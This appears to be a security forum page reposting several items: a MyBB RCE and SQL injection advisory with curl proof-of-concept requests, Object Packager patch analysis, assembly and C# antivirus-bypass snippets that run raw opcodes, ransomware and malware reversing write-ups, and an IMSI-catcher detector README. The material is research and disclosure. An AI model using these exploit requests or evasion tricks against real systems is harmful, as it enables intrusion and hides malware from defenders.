Nytro

broadAnyWhere_poc_by_retme_bug_17356824 PoC source code of Android Bug: 17356824. diff of bug:https://android.googlesource.com/platform/packages/apps/Settings/+/37b58a4%5E%21/#F0 You can send broadcast to almost ANY reciever you want,even if it's a protect-broadcast or the reciever is a unexported/permission-limited one. All the devices prior to Android 5.0 are affected. demo video:Bug 17356824 poc video—????—???????????? more info: 360???? broadAnywhere?Broadcast?????????Bug: 17356824? - Retme???????? Sursa: https://github.com/retme7/broadAnyWhere_poc_by_retme_bug_17356824#broadanywhere_poc_by_retme_bug_17356824

Ne poti da un PSD / PNG mare cu logo-ul asta? Doar logo, fara CSS-ul din spate?

[h=1]MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability[/h] # Exploit Title: MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability # Date: 2014-11-21 # Exploit Author: Taoguang Chen # Vendor Homepage: twitter.com/chtg57 # Software Link: www.mybb.com # Version: MyBB 1.8 <= 1.8.2 and MyBB 1.6 <= 1.6.15 MyBB had released 1.8.3 and 1.6.16 to fixed this vulnerability. Advisory: https://gist.github.com/chtg/e9824db42a8edf302b0e #MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.03.06 > MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution. ##I. MyBB's unset_globals() Function Bypass When PHP's register\_globals configuration set on, MyBB will call unset\_globals() function, all global variables registered by PHP from $\_POST, $\_GET, $\_FILES, and $\_COOKIE arrays will be destroyed. ``` if(@ini_get("register_globals") == 1) { $this->unset_globals($_POST); $this->unset_globals($_GET); $this->unset_globals($_FILES); $this->unset_globals($_COOKIE); } ... } ... function unset_globals($array) { if(!is_array($array)) { return; } foreach(array_keys($array) as $key) { unset($GLOBALS[$key]); unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4 } } ``` But unset\_globals() function can be bypassed. ###i) $\_GET, $\_FILES, or $\_COOKIE Array was Destroyed ``` foo.php?_COOKIE=1 // $_GET['_COOKIE'] ``` When $_GET['\_COOKIE']=1 is sent, unset\_globals() will destroy $GLOBALS['\_COOKIE']. ``` $this->unset_globals($_GET); ... } ... function unset_globals($array) { ... foreach(array_keys($array) as $key) { unset($GLOBALS[$key]); ``` This means $\_COOKIE array will be destroyed. This also means all global variables registered by PHP from $\_COOKIE array will be destroyed because them will not be handled by unset(). ``` $this->unset_globals($_COOKIE); } ... } ... function unset_globals($array) { if(!is_array($array)) { return; } ``` By the same token, if $\_GET or $\_FILES array was destroyed via unset\_globals(), the corresponding global variables registered by PHP will not be destroyed. ###ii) $GLOBALS Array was Destroyed ``` foo.php?GLOBALS=1 // $_GET['GLOBALS'] ``` When $\_GET['GLOBALS']=1 is sent, unset\_globals() will destroy $GLOBALS['GLOBALS']. This means $GLOBALS array will be destroyed. $GLOBALS array is a automatic global variable, and binding with global symbol table, you can use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. This means that the binding between the $GLOBALS array and the global symbol table will be broken because $GLOBALS array has been destroyed. This also means all variables registered by PHP from $\_GET, $\_FILES and $\_COOKIE arrays will not be destroyed. By the same token, when $\_POST['GLOBALS'], $\_FLIES['GLOBALS'], or $\_COOKIE['GLOBALS'] is sent, unset\_globals() will destroy $GLOBALS array, then the corresponding global variables registered by PHP will not be destroyed. In fact, MyBB is already aware of the problem: ``` $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS"); foreach($protected as $var) { if(isset($_REQUEST[$var]) || isset($_FILES[$var])) { die("Hacking attempt"); } } ``` Unfortunately, there is a small hole yet:-) $\_REQUEST is an associative array that by default contains mix of $\_GET, $\_POST, and $\_COOKIE arrays data. But PHP >= 5.3 introduced request\_order configuration, the directive affects the contents of $\_REQUEST array. ``` request_order = "GP" ``` This is recommended setting in php.ini. Set it to "GP" means only $\_GET and $\_POST arrays data is merged into $\_REQUEST array without $\_COOKIE array data. So, it is possible that sent $\_COOKIE['GLOBALS'], then bypass unset\_globals() function in PHP 5.3. ##II. Remote Code Execution Vulnerability There is one interesting method in MyBB: ``` class MyBB { ... function __destruct() { // Run shutdown function if(function_exists("run_shutdown")) { run_shutdown(); } } } ``` Look into run\_shutdown() function: ``` function run_shutdown() { global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb; ... // Run any shutdown functions if we have them if(is_array($shutdown_functions)) { foreach($shutdown_functions as $function) { call_user_func_array($function['function'], $function['arguments']); } } $done_shutdown = true; } ``` The $shutdown\_functions was initialized via add\_shutdown() function in init.php: ``` // Set up any shutdown functions we need to run globally add_shutdown('send_mail_queue'); ``` But add\_shutdown() function initialization handler is wrong: ``` function add_shutdown($name, $arguments=array()) { global $shutdown_functions; if(!is_array($shutdown_functions)) { $shutdown_functions = array(); } if(!is_array($arguments)) { $arguments = array($arguments); } if(is_array($name) && method_exists($name[0], $name[1])) { $shutdown_functions[] = array('function' => $name, 'arguments' => $arguments); return true; } else if(!is_array($name) && function_exists($name)) { $shutdown_functions[] = array('function' => $name, 'arguments' => $arguments); return true; } return false; } ``` In the above code we see that run\_shutdown() function is vulnerable because $shutdown\_functions is initialized correctly and therefore result in arbitrary code execution. ##III. Proof of Concept When request\_order = "GP" and register\_globals = On, remote code execution by just using curl on the command line: ``` $ curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://www.target/ ``` ##IV. P.S.I **Another case to exploit the vulnerability:** When PHP's "disable\_functions" configuration directive disable ini\_get() function: ``` disable_functions = ini_get ``` The unset\_globals() function will not be called that regardless of register\_globals set on or off. ``` if(@ini_get("register_globals") == 1) { $this->unset_globals($_POST); $this->unset_globals($_GET); $this->unset_globals($_FILES); $this->unset_globals($_COOKIE); } ``` **Proof of Concept** Works on disable\_functions = ini\_get and register\_globals = On: ``` index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1 ``` ##V. P.S.II **SQL injection vulnerability via run\_shutdown() function** ``` function run_shutdown() { global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb; ... // We have some shutdown queries needing to be run if(is_array($shutdown_queries)) { // Loop through and run them all foreach($shutdown_queries as $query) { $db->query($query); } } ``` The $shutdown\_queries was initialized in global.php: ``` $shutdown_queries = array(); ``` But not all files are included global.php, such as css.php: ``` require_once "./inc/init.php"; ``` There is not included global.php, and $shutdown\_queries is uninitialized, with the result that there is a SQL injection vulnerability. **Proof of Concept** Works on request\_order = "GP" and register\_globals = On: ``` $ curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj" http://www.target/css.php ``` Works on disable\_functions = ini\_get and register\_globals = On: ``` css.php?shutdown_queries[]=SQL_Inj ``` ##VI. Disclosure Timeline * 2014.03.06 - Notified the MyBB devs via security contact form * 2014.11.16 - Renotified the MyBB devs via Private Inquiries forum because no reply * 2014.11.20 - MyBB developers released MyBB 1.8.3 and MyBB 1.6.16 * 2014.11.21 - Public Disclosure Sursa: MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability

SandWorm’s target: A patch history of Object Packager Matt_Oh| November 20, 2014 Last Patch Tuesday (that is, November 11, 2014), Microsoft released MS14-064, a security patch for a SandWorm 0-day vulnerability. They had also previously patched the vulnerability with the October patch Tuesday release (MS14-060) but malware samples working around the fix were subsequently found in the wild. Interestingly, the affected module, Object Packager, had suffered a similar issue in 2012 with security bulletin MS12-005. That issue was about remote code execution using the ClickOnce functionality embedded in Microsoft Office files. The issues with the latest two patches this year concern remote code execution with INF or EXE files embedded in Microsoft Office files; only the type of embedded object differs. When I looked into the patch, I found striking similarities between them. Here are my findings. Marking files unsafe One of the main similarities between the patches is with the zone identifier. Both MS12-005 and MS14-060 add code to mark files unsafe by using a zone identifier. This pops up a warning dialog box on the user’s screen before binaries are executed. This provides additional protection for the user - any embedded object dropped in the temporary folder from Office documents should be treated as potentially dangerous. How MarkFileUnsafe works To understand what the MarkFileUnsafe function does, I opened packager.dll up in IDA. After a bit of debugging, I found that it uses the CZoneIdentifier object to set the zone identifier ID to 3 (URLZONE_INTERNET), as we see in Figure 1.The zone identifier concept was first introduced with Windows XP SP2 and it uses an Alternative Data Stream file, Zone.Identifier, to mark a file’s origin. For example, if a file was downloaded from the Internet through a web browser, it would be marked with ‘ID 3’ which corresponds to URLZONE_INTERNET. For a good explanation of the CZoneIdentifier, see this blog post from Microsoft. Figure 1 Calling CZoneIdentifier::SetId with argument 3 (URLZONE_INTERNET) Marking the file with ID 3 means that the file is treated as unsafe. When it is executed, it triggers a user confirmation dialog that looks like the one shown in Figure 2. This is a road block to malware or exploits that may try to abuse the related feature. Figure 2 Security Warning dialog CVE-2014-4114 The CVE-2014-4114 vulnerability used in the SandWorm operation was fixed mainly by marking dropped files unsafe (as I explained in my previous blog post). Figure 3 shows three functions that have been patched by adding a call to the MarkFileUnsafe function. The whole point of the MS14-60 patch was to mark dropped files as unsafe. Figure 3 Three functions patched with the addition of the MarkFileUnsafe function call CVE-2012-0013 An interesting fact is that a similar patch to other functions with similar functionality had been performed in 2012 with MS12-005. It fixed the CVE-2012-0013 vulnerability, which allowed execution of the ClickOnce application embedded in Microsoft Office files. Looking at Figure 4 you can see that the MarkFileUnsafe function was added to the patched packager.dll file. Figure 4 Patched functions with MS12-002 Some of the patched functions, including CPackage::CreateTempFile and CPackage::EmbedreadFromStream introduced a call to MarkFileUnsafe just after copying the file to the temporary folder, as shown in Figure 5. Figure 5 Addition of a call to MarkFileUnsafe Similar issues in the same function - CPackage::DoVerb Somehow, one specific function, CPackage::DoVerb, is a ‘hot zone’ which is patched again and again. The reason for this is that this is the main function where all the external command and object handling occurs using shell extensions and COM interfaces. CVE-2014-6352 A ‘verb’ is the term used to describe a case where a command string is passed through the Object Packager to an external component. The original intended purpose of the Object Packager from Office was mostly to play animation with graphics and sound. This verb can be used to pass various commands to the non-OLE component. Verb commands are basically strings like “play”, “pause” and “resume”, etc. but there are two special defined verb values: “0” and “1”. The first, “0” means open the object for editing while “1” means open the object for “viewing”. This MSDN article has a good description of this feature. However, it looks like you also can pass other numbers that perform additional operations, including running linked programs with the attachment itself as the input. Figure 6 Show OK/Cancel message box Figure 6 shows how this vulnerability was fixed. It displays an additional message box before it calls the InvokeCommand method from the CDefFolderMenu class in shell32.dll. The message box can be turned off if you set a special registry key, as shown in Figure 7. To fix it, they made opt-out the default behavior for this function. Figure 7 Retrieve registry value CVE-2012-0013 CVE-2012-0013 also had a patch on this same method – CPackage::DoVerb. When the ClickOnce application was embedded inside a Microsoft Office file, it could bypass the special check in the Object Packager. Figure 8 and Figure 9 show the GiveWarningMsg methods called just before dangerous operations like ActivateEmbeddedFile or ShellExecuteExW that launch external programs are performed. Figure 8 Unpatched code with the GiveWarning call Figure 9 Unpatched code with the GiveWarning call The approach with unpatched code used a blacklist of file extensions, as Figure 10 shows. Figure 11 shows part of the GiveWarningMsg function. It passed a blacklist of extensions to the sub-function to compare. If the file’s extension was on this list, it did not pass through to the following dangerous operations. Figure 10 Extension black list Figure 11 Check extension black list But, it looks like this blacklist didn’t cover every possible dangerous extension, and ClickOnce was one of those. The patch from the vendor solves this problem by ditching the blacklist approach, instead using an opt-in registry key. If you don’t set a specific registry key, you will not be allowed to run any dangerous APIs by default, as shown in Figure 12. Figure 12 Checking opt-in registry key For example, based on this registry key, ShellExecuteEx will either be allowed or not, as we see in Figure 13. The point is that by default, the dangerous operation is blocked. This is a similar approach to how CVE-2014-6352 was solved using a default opt-out approach. Figure 13 By default, show message and exit Conclusion So, packager.dll has gone through three rounds of patching over the last few years: MS12-005, MS14-060 and MS14-064. MS12-005 fixed the CVE-2014-0013 ClickOnce issue. MS12-005 and MS14-064 cover a special verb command issue. The problem is that the three patches touch on the same issues over and over again. MS12-005 introduced the MarkFileUnsafe function and applied it to two functions. Now MS14-060 applies the same patches to an additional three functions that perform very similar actions – file dropping. MS12-005 fixed an extension validation issue in the CPackage::DoVerb function by introducing a special registry key switch. MS14-064 fixed a very similar issue inside the exact same function by introducing a special registry key and confirmation message box. MS12-005 fixed a dangerous call to the ShellExecuteExW API and MS14-064 fixes dangerous usage of the IContextMenu interface, which can be abused to run arbitrary commands through the extension context menus functionality. Using the IContextMenu interface to launch remote code execution isn’t obvious at first, but allowing a COM call to the shell component doesn’t sound so secure either. Based on my findings, I think there was a good chance to fix the SandWorm vulnerability two years ago, before it was used by malware authors and became an issue. We can’t reverse time, but we can, and should, learn from the past. Sursa: SandWorm’s target: A patch history of Object Packa... - HP Enterprise Business Community

UNREAL MODE:BREAKING PROTECTED PROCESSES Alex Ionescu NSC 2014 Alex Ionescu’s Blog @aionescu INTRODUCTION •Windows Vista introduced core changes to the kernel to allow atomic, kernel-driven process creation inside of a “protected environment” •Used to protect access to the DRM keys and to secure the System process •Windows 8.1 extends that model in order to protect key non-DRM system processes even from Admin, and to mitigate against pass-the-hash attacks •Digital signatures and code signing now add an additional boundary of protection beyond load/don’t load •Similar to the iOS Entitlement Model •Mechanisms change a few core security paradigms: •Admin == Kernel is something that Microsoft has sometimes disagreed with, especially in light of PatchGuard, Code Signing and DRM. Now it’s really != •Unkillableprocesses and unstoppable services are now something supported and documented for developer (mis)use Download: http://www.nosuchcon.org/talks/2014/D3_05_Alex_ionescu_Breaking_protected_processes.pdf

assembly, c-sharp, anti-sandbox, anti-antivirus, anti-debug, and malware research Hello fellow readers! You all are probably wondering what the hell I’ve been up to this past month. Lot’s of stuff. This post is all over the place with code and slides and malware and general wackiness. Rather than spreading it out over several blog posts, I decided to just get it all over with so I can focus on cooler things in the future. I saw an interesting webinar on sandbox detection techniques employed by malware by Cyphort. They haven’t released their slides like they said they would, so here are the ones I took. These are cool and all, but I felt like I could contribute. I read an awesome paper on bypassing antiviruses by employing a number of code based tricks. The idea behind them was that AV’s will skip binaries based on certain behaviors. One thing missing though – an AV will skip the “dropper” heuristic if the file ends in ‘.msi’. All the code I saw was in C/C++. I figured why not try and convert it to assembly? Next thing to do is make a patcher that can inject these into pre-compiled binaries. A future project perhaps? Anyways, I only did 2 before I lost interest. Read the article here. ;AV bypass 1 xor eax, eax db Caption "Joe" db Text "Giron" mov edx, 5F5E100h joe: inc eax dec edx jnz joe cmp eax, 5F5E100h jnz short urafag push 0 ; MB_OK push offset Caption push offset Text push 0 ; hWnd call MessageBoxA urafag: xor eax, eax retn ;AV bypass 1.5 ; same as above, just using the loop instruction instead of branching conditionals xor eax, eax db Caption "Joe" db Text "Giron" mov ecx, 5F5E100h joe: ; essentially do nothing mov eax,10 mov ebx,20 xchg eax,ebx loop joe ; now start code xor eax,eax xor ebx,ebx push 0 ; MB_OK push offset Caption push offset Text push 0 ; hWnd call MessageBoxA retn ;AV bypass 2 push ebx push edi push 5F5E100h ; bytes to alloc push 40h ; zero init call GlobalAlloc mov ebx, eax test ebx, ebx jz short cleanup mov edi, ebx mov eax, 0FFFFFFF1h mov ecx, 5F5E100h rep stosb push 0 ; MB_OK push offset Caption ; "Joe" push offset Text ; "Giron" push 0 ; hWnd call MessageBoxA push ebx ; memory handler call GlobalFree cleanup: xor eax, eax pop edi pop ebx retn Feels good to put my crappy assembly skills to good use. Especially now that I figured out how to use inline assembly within C#. Sort of. The way it works is by utilizing delegates and cramming code inside an executable code page. Observe this piece of genius: using System; using System.Collections.Generic; using System.Text; using System.Runtime.InteropServices; namespace InLineAsm { static class Program { [unmanagedFunctionPointer(CallingConvention.StdCall )] delegate void JoesAntiDebuggery(); [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, IntPtr flAllocationType, IntPtr flProtect); static byte[] opcodez = { 0x55, 0x89, 0xE5, 0x31, 0xC0, 0xBA, 0x00, 0xE1, 0xF5, 0x05, 0x40, 0x4A, 0x75, 0xFC, 0x3D, 0x00, 0xE1, 0xF5, 0x05, 0x75, 0x14, 0x6A, 0x00, 0x68, 0x12 ,0x70, 0x40, 0x00, 0x68, 0x0C, 0x70, 0x40, 0x00, 0x6A, 0x00, 0xFF, 0x15, 0xD0, 0x80, 0x40, 0x00, 0x31, 0xC0, 0x68, 0x00, 0x70, 0x40, 0x00, 0xE8, 0x3B, 0x00, 0x00, 0x00, 0x59, 0x31, 0xC0, 0x89, 0xEC, 0x5D, 0xC3 } // opcodes taken from disassembled program. /* __asm { xor eax, eax mov edx, 5F5E100h joe: inc eax dec edx jnz joe cmp eax, 5F5E100h jnz short urafag } MessageBox(0,Text, Caption,0); __asm { urafag: xor eax, eax } */ static IntPtr codeBuffer = VirtualAlloc(IntPtr.Zero, new UIntPtr((uint)opcodez.Length), (IntPtr)(0x1000 | 0x2000), (IntPtr)0x40); // EXECUTE_READWRITE, MEM_COMMIT | MEM_RESERVE Marshal.Copy(opcodez, 0,codeBuffer, opcodez.Length); JoesAntiDebuggery JoeDbg = (JoesAntiDebuggery) Marshal.GetDelegateForFunctionPointer(codeBuffer, typeof(JoesAntiDebuggery)); static void Main(string[] args) { Console.Write("lol"); JoeDbg(); } } } It’s a thing of beauty – Assembly, C code, op codes / hex, delegates, and C#. Moving on to what else I’ve been up to – pulling apart malwarez. This one piece gave me trouble for a few days. Namely because of the weird anti-debugging counter measure I encountered. I’m unsure if its even anti-debug as the conditions always seem to equate to false. I mean it’s easy to get around when you see it, but you can’t get around it automatically – you have to patch it. I even took a video of the weird behavior. Took me some time, but I figured it out. The following is the sequence called not 5 instructions after the entry point sub_4017CF proc near push ebp mov edi, edx add edi, ebx not ebx mov ebp, esp add edi, ebx add esp, 0FFFFFF94h mov edx, ebx inc ebx mov ecx, esp dec ebx mov edi, eax add ecx, 48h mov ebx, ecx dec edi cmp eax, ecx jz short labelforyou neg edx leave not edx mov eax, edi neg eax leave add edx, edi not edx retn labelforyou: leave retn The first thing you may notice about this procedure is the weird stack frame setup. Most of the time, the intro stack frame will be “push ebp” followed directly by “mov ebp, esp”. This one is different in that it plays with the registers a little before the “mov ebp, esp” assembly codes. You may also notice the 2 “leave” instructions at the end of the procedure as opposed to the 1 for the “labelforyou” conditional. The 2 “leave” instructions are why the program jumps to ExitThread. When you leave a stack frame twice and ‘ret’, any windows program jumps to ntdll.RtlExitUserThread. An interesting intrinsic way of quietly exiting without warning. But what about the code that leads up to the ‘JZ’ branch and the 2 leaves? The comparison is EAX to ECX. Every time I run, EAX always ends up as 1 and ECX as some stack address. I’m postulating that the malware I grabbed was extracted from a dropper. That makes sense given the stack value / pointer points to nothing useful. If you’re curious what the malware does, it attempts to download and run a ‘doc’ file from a russian host. Inside the ‘doc’ file is HTML code with a meta redirect to a host my DNS server can’t seem to find: You can download the malware here. Pass in ‘infected’. The other piece of malware I went through lacked a DOS sub. Most exe’s have this little DOS application inside that reads “this program cannot be run in DOS mode” and is placed at the start of an exe just in case someone attempts to run an exe on an old DOS system. Its a forward compatibility thing Microsoft does. Compare a normal exe to the binary: So how the hell do you remove the DOS sub and still maintain functionality? According to TinyPE, you do it in assembly via zeroing out the MZ header with the exception of the ‘e_magic’ field ‘MZ’ at the start and the ‘e_lfanew’ field value at the bottom. The ‘e_lfanew’ field is just a 4 byte offset to where the PE header is located. mzhdr: dw "MZ" ; e_magic dw 0 ; e_cblp UNUSED dw 0 ; e_cp UNUSED dw 0 ; e_crlc UNUSED dw 0 ; e_cparhdr UNUSED dw 0 ; e_minalloc UNUSED dw 0 ; e_maxalloc UNUSED dw 0 ; e_ss UNUSED dw 0 ; e_sp UNUSED dw 0 ; e_csum UNUSED dw 0 ; e_ip UNUSED dw 0 ; e_cs UNUSED dw 0 ; e_lsarlc UNUSED dw 0 ; e_ovno UNUSED times 4 dw 0 ; e_res UNUSED dw 0 ; e_oemid UNUSED dw 0 ; e_oeminfo UNUSED times 10 dw 0 ; e_res2 UNUSED dd pesig ; e_lfanew But what about doing it to a pre-compiled binary? I just used CFF explorer and HXD. Jot down the ‘e_lfanew’ field offset and zero out the entries between the PE header, the MZ field, and the ‘e_lfanew’ field: The malware does code running modification and is surprisingly sophisticated, but this blog post is long enough. I’m done for now. The next post will be much more interesting, however its unfinished and needs more research. Except it soon. This entry was posted on Saturday, November 22nd, 2014 at 1:51 pm and is filed under code, Joe you evil bastard, reversing. You can follow any responses to this entry through the RSS 2.0 feed. You can skip to the end and leave a response. Pinging is currently not allowed. Sursa: assembly, c-sharp, anti-sandbox, anti-antivirus, anti-debug, and malware research « Joe's Security Blog

malware repository framework - for personal use only malwaRE Malware repository framework Description malwaRE is a malware repository website created using PHP Laravel framework, used to manage your own malware zoo. malwaRE was based on the work of Adlice team with some extra features. If you guys have any improvements, please let me know or send me a pull request. Features Self-hosted solution (PHP/Mysql server needed) VirusTotal results (option for uploading unknown samples) Search filters available (vendor, filename, hash, tag) Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender Add writeup url(s) for each sample Manage samples by tag Tag autocomplete VirusTotal rescan button (VirusTotal's score column) Download samples from repository Sursa: https://github.com/c633/malwaRE

A Nightmare on Malware Street CoinVault ransomware in the wild By Santiago Pontiroli on November 22, 2014. 4:49 Another ransomware has been spotted in the wild lately, branded as 'CoinVault'. This one involves some interesting details worth mentioning, including the peculiar characteristic of offering the free decryption of one of the hostage files as a sign of good faith. Technically, the malware writers have taken a lot of measures to slow down the analysis of the sample. Even though it was made with Microsoft's .NET framework, it takes a while to reach the core of their malicious application. Upon opening the initial sample in 'IL Spy', we find that the program starts by using a string key which is passed to a decryption method, which will ultimately get the executable code. A byte array is also passed as a parameter to the 'EncryptOrDecrypt' method, which in conjunction with the key will output a final byte array with the malware's much needed code. Implementing these functions in Visual Studio is as easy as copy/paste, so we execute the methods gotten from the source code and set a breakpoint to check what the decryption method is doing. A '77', '90' in decimal tells us we are on the right track since when converting these numbers to hexadecimal we get '4D', '5A', which is the magic number for DOS executable files identified by the ASCII string 'MZ'. We dump all the bytes to an executable file in disk for further analysis. We get a file called 'SHIELD runner', serving as a 'RunPE' helper application. A 'RunPE' application serves to execute files on the fly, meaning that a memory stream is created from an input and executed directly without first storing the file to disk. This is useful for malware writers that want to avoid leaving traces behind, and as we'll soon see, it's not all this file has to offer. Although we'll carry on with our investigation into the ransomware code, there's a noteworthy string embedded in the SHIELD runner executable, 'd:\Users\dennis…'. In the same way as before, a string key and a byte array are used to generate yet another executable file. As you can see, the cybercriminals have gone to great lengths in order to slow down the analysis and hide the malicious payload for as long as possible. Not only do we have the usual 'RunPE' functions but also a nice additional set of methods that will help the malware detect analysis tools and virtualized environments. It checks for 'Sandboxie', 'Wireshark', 'Winsock Packet Editor' and even checks whether the machine's name is 'MALTEST'. Fortunately, none of these conditions are met in my environment so we are good to go. But wait…. there's more! The detection of the virtualized environment will cause the execution to stop and the malicious payload to be hidden. Using PowerShell, we are going to check if the malware can actually detect our environment. Apparently it can, so we'll need to carry out some simple modifications in order to continue the analysis process. We can fix this easily from VMWare's configuration VMX file, setting the option 'SMBIOS.reflectHost = TRUE'. Running out PowerShell checks again, we witness the good news and are ready to go even further. Repeating the process of string key and byte array decryption and dumping the memory at just the right time pays off and we finally end up with the set of files that will be used during the infection. The CoinVault 'Locker' has two main Windows forms: the main one telling us to pay in order to recover the victim's files and 'frmGetFreeDecrypt' which is used to decrypt one of the victim's files as a way to demonstrate that we can in fact recover our precious information if we comply in a timely manner. However, before the 'Locker' analysis we'll need to deobfuscate it (at least a little bit). The malware writers display some sense of humor here: if the analyst has gone through this much trouble to reach this point it seems he's welcome as suggested by the phrase, 'Your worst nightmare'. Moreover, they are keen enough to leave a banner signaling the obfuscation utility they used. In this case we are dealing with the ever popular 'Confuser', in its version 1.9.0.0. Certainly, this is confusing… but we can make it better. So, we go from something that resembles a Chinese manuscript to readable source code. We now can see, amongst the many (many) methods and delegates inside the assembly some relevant code regarding the file encryption. .NET's 'System.Security.Cryptography.RijndaelManaged' namespace is used (amongst others) revealing symmetric encryption functionality. We can even get a glance at how the PRNG was implemented and some internal details of the malicious application. When we are finally shown the 'Locker' executable, a connection is made to a dynamic domain. During the analysis, two addresses were present: 'cvredirect.no-ip.net' and 'cvredirect.ddns.net'. They are currently offline and this hampers the 'Locker' functionality, since upon traffic analysis inspection we were able to see that a hardware ID is sent to the C&C in order to use a dynamic file encryption password. I guess now we can understand why the malware is checking for Wireshark in the system. After all, cybercriminals wouldn't want you to take a peek at how their business is getting done. At this point, if everything went well (for the cybercriminals) your personal documents and files have been encrypted and a payment is demanded in less than 24 hours or the price will rise. The bitcoin address used is dynamic too, making the tracing of the funds a lot more complex than usual. Is this your worst nightmare? If you don't have an updated anti-malware suite and (just in case) a backup of your most important files, it might just be. Kaspersky detects this family as 'Trojan-Ransom.Win32.Crypmodadv.cj'. We have already seen similar malicious applications in the past (regarding functionality) such as 'TorrentLocker', and some PowerShell ransomware, but the amount of effort invested in this one in order to protect the code shows that cybercriminals are leveraging already developed libraries and functionality in order to avoid reinventing the wheel. Sursa: https://securelist.com/blog/virus-watch/67699/a-nightmare-on-malware-street/

Now cyber criminals use E-cigarettes to spread malware Now cyber criminals use E-cigarettes to spread malware Many health specialists may be pushing the chain smokers in the world for E-cigarettes over normal tobacco ones. The smokers may not be embracing E-cigarettes wholeheartedly but there is one group who does. Yes, cyber criminals have take a special liking to the E-cigarettes and now electronic cigarettes have become the latest vector for injecting malware. How is E-cigarette being used The E-cigarettes have to be charged over USB, either with a special custom cable, or by plugging the cigarette itself directly into a USB port. The ones that come with the USB port charging are the one that are fast becoming a favourite threat vector for the cyber criminals. The malware is apparently hardcoded into the charger for these E-cigarettes and as soon as its hooked to a PC they start their malicious work. For one they are inconspicuous, who the hell would think that a puny E-cigarette might be carrying a malware. The second point is that the USB port allows the cyber criminals to physically access your device. Vapourizer The use of E-cigarette for injecting malware first surfaced on Reddit. A redditor, Jockrilla posted the below comment on Reddit and that started the things moving I have a story I wanted to share about a data security breach at a large corporation. One particular executive had a malware infection on his computer from which the source could not be determined. The executive’s system was patched up to date, had antivirus and up to date anti-malware protection. Web logs were scoured and all attempts made to identify the source of the infection but to no avail. Finally after all traditional means of infection were covered; IT started looking into other possibilities. They finally asked the Executive, “Have there been any changes in your life recently”? The executive answer “Well yes, I quit smoking two weeks ago and switched to e-cigarettes”. And that was the answer they were looking for, the made in china e-cigarette had malware hard coded into the charger and when plugged into a computer’s USB port the malware phoned home and infected the system. Moral of the story is have you ever question the legitimacy of the $5 dollar EBay made in China USB item that you just plugged into your computer? Because you should, you damn well should. Sincerely, An IT guy The post seemed to suggest that a large corporation was subjected to a data breach because one of the exec had started smoking E-cigarette or “vapourizer” which had a malware hard coded into the charger. When the charger was plugged into the exec’s system the malware infected it. Plausible or fairy tale? For the looks of it, the Redditors claim looks very plausible given the fact that just recently, a security researcher, Karsten Nohl had demonstrated the virtually unpatchable attack called BadUSB with its proof-of-concept. He had further stated that more than half the USB devices available in the market may be susceptible to the BadUSB attack. Combining the two reports gives you a plausible explanation for the malware spreading through a E-cigarette. Dave Goss, of London’s Vape Emporium, says that vapourizers can remain safe by buying from respected manufacturers such as Aspire, KangerTech and Innokin, and by checking for “scratch checkers” on the box, which mark out authentic goods from counterfeits. “Any electrical device that uses a USB charger could be targeted in this way, and just about every one of these electrical devices will come from China,” he adds. It is suggested to those who use such kind of USB devices, to only charge USB devices through a wall adapter (they charge faster anyway). If you really need to charge through USB then you are advised to get what is called a “USB Condoms”, which will make sure that only power is drawn and no data is exchanged. Sursa: Now cyber criminals use E-cigarettes to spread malware

[h=3]Android IMSI-Catcher Detector (AIMSICD)[/h] Android-based project to detect and avoid fake base stations (IMSI-Catchers) in GSM/UMTS Networks. Feel free to read the Press Releases about us, spread the word with our Media Material and help us solving current challenges! [h=2] [/h] [h=2][/h] [h=1]Index[/h] Introduction IMSI-Catchers Project Goals Limitations Roadmap WIP-RELEASES Requirements Installation General (non-geek) Technical (geek) User Guide Disclaimer Privacy Building Changelog Discussion Contributing Bugs FAQ Support Sources Credits License Sponsors Contact Recommendations [h=1]Introduction[/h] Both law enforcement agencies and criminals use IMSI-Catchers, which are false mobile towers acting between the target mobile phone(s) and the service providers real towers. As such it is considered a Man In the Middle (MITM) attack. It was patented and first commercialized by Rohde & Schwarz in 2003, although it would be hard to maintain such a patent, since in reality it is just a modified cell tower with a malicious operator. On 24 January 2012, the Court of Appeal of England and Wales held that the patent is invalid for obviousness. But ever since it was first invented, the technology has been used and "improved" by many different companies around the world. Other manufacturers (like Anite) prefer to refer to this spying and tracking equipment in cozy marketing words as "Subscriber Trackers". In the USA this technology is known under the name "StingRay", which is even capable to track the people who are traveling together with the owner of a targeted phone across the country. Here you can see alleged StingRay tracking devices mounted to the roof of three SUVs. The FBI or local police might deploy the device at a protest to obtain a record of everyone who attended with a cell phone. IMSI-Catchers also allow adversaries to intercept your conversations, text messages, and data. Police can use them to determine your location, or to find out who is in a given geographic area at what time. Identity thieves might operate an IMSI-Catcher in a parked car in a residential neighborhood, stealing passwords or credit card information from people nearby who make purchases on their phones. There is more: Powerful, expensive IMSI-Catchers are in use at federal agencies and some police departments. And if you think that IMSI-Catchers are not used in your own town, think twice! If you ever happen to be near a riot or demonstration (hint: leave you phone at home if participating), pay close attention to cars standing along the path of the demonstration - those might be IMSI-Catchers. It is common practice for police to position IMSI-Catchers at the beginning as well as the end of roads where the demonstrating crowd moves to capture and compare data in order to find out who participated. But most of the time IMSI-Catchers are well hidden and can be even body-worn - therefore you won't even discover these creepy devices. Current technology shrinks them to be as tiny as your phone! So again, if you really have to participate in a riot or demonstration, leave your phones at home or build yourself a signal blocking phone pouch! YouTube: DEF CON 18 - 